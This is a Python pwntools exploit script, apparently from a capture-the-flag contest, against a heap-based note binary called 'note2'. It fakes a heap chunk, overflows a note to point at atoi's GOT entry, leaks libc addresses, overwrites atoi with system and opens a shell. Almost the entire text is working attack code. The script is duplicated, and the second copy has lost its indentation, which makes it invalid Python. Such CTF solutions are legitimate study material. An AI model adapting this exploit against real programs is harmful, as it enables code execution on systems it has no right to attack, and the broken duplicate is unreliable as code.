cubarco/zctf-note2.py

## zctf-note2.py
#!/usr/bin/env python
# coding=utf8

from pwn import process, ELF, p64
from struct import unpack

# elf = ELF('./libc-2.19.so')
elf = ELF('/lib64/libc.so.6')
p = process('./note2')

name_bss = 0x6020e0
atoi_got = 0x602088
system_offset_to_atoi = elf.symbols['system'] - elf.symbols['atoi']


def add_note(size, content=None):
    p.sendline('1')
    p.sendline(str(size))
    if content:
        p.sendline(content)


def show_note(index):
    p.sendline('2')
    p.sendline(str(index))


def edit_note(index, mode, content):
    p.sendline('3')
    p.sendline(str(index))
    p.sendline(str(mode))
    p.sendline(content)


def delete_note(index):
    p.sendline('4')
    p.sendline(str(index))


if __name__ == '__main__':
    # name
    p.sendline(p64(0) + p64(0x21) + 'A' * 0x10 + p64(0) + p64(0x21))
    p.sendline('address')

    # heap overflow and modify the address malloced in edit function
    # then the fake chunk will be freed and appended to fastbin
    add_note(0, 'A'*15)  # leave one zero byte for appending
    add_note(0x80, 'A')
    for _ in range(7):
        edit_note(0, 2, 'A' * 0x10)
    edit_note(0, 2, 'A' + p64(name_bss + 0x10))

    # malloc the fake chunk in name
    add_note(0, 'A'*0x10)
    edit_note(2, 2, 'A'*(0x20-1))  # leave one zero byte for appending
    edit_note(2, 2, 'A' + p64(atoi_got))  # modify the address of first note
    show_note(0)
    p.recvuntil('Content is ')

    atoi_addr = unpack('Q', p.recv(6).ljust(8, '\x00'))[0]
    print '[*] atoi_addr: 0x%x' % atoi_addr
    system_addr = atoi_addr + system_offset_to_atoi
    print '[*] system_addr: 0x%x' % system_addr

    edit_note(0, 1, p64(system_addr))
    p.sendline('/bin/sh')

    p.clean()
    p.interactive()
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process, ELF, p64
	from struct import unpack

	# elf = ELF('./libc-2.19.so')
	elf = ELF('/lib64/libc.so.6')
	p = process('./note2')

	name_bss = 0x6020e0
	atoi_got = 0x602088
	system_offset_to_atoi = elf.symbols['system'] - elf.symbols['atoi']


	def add_note(size, content=None):
	p.sendline('1')
	p.sendline(str(size))
	if content:
	p.sendline(content)


	def show_note(index):
	p.sendline('2')
	p.sendline(str(index))


	def edit_note(index, mode, content):
	p.sendline('3')
	p.sendline(str(index))
	p.sendline(str(mode))
	p.sendline(content)


	def delete_note(index):
	p.sendline('4')
	p.sendline(str(index))


	if __name__ == '__main__':
	# name
	p.sendline(p64(0) + p64(0x21) + 'A' * 0x10 + p64(0) + p64(0x21))
	p.sendline('address')

	# heap overflow and modify the address malloced in edit function
	# then the fake chunk will be freed and appended to fastbin
	add_note(0, 'A'*15) # leave one zero byte for appending
	add_note(0x80, 'A')
	for _ in range(7):
	edit_note(0, 2, 'A' * 0x10)
	edit_note(0, 2, 'A' + p64(name_bss + 0x10))

	# malloc the fake chunk in name
	add_note(0, 'A'*0x10)
	edit_note(2, 2, 'A'*(0x20-1)) # leave one zero byte for appending
	edit_note(2, 2, 'A' + p64(atoi_got)) # modify the address of first note
	show_note(0)
	p.recvuntil('Content is ')

	atoi_addr = unpack('Q', p.recv(6).ljust(8, '\x00'))[0]
	print '[*] atoi_addr: 0x%x' % atoi_addr
	system_addr = atoi_addr + system_offset_to_atoi
	print '[*] system_addr: 0x%x' % system_addr

	edit_note(0, 1, p64(system_addr))
	p.sendline('/bin/sh')

	p.clean()
	p.interactive()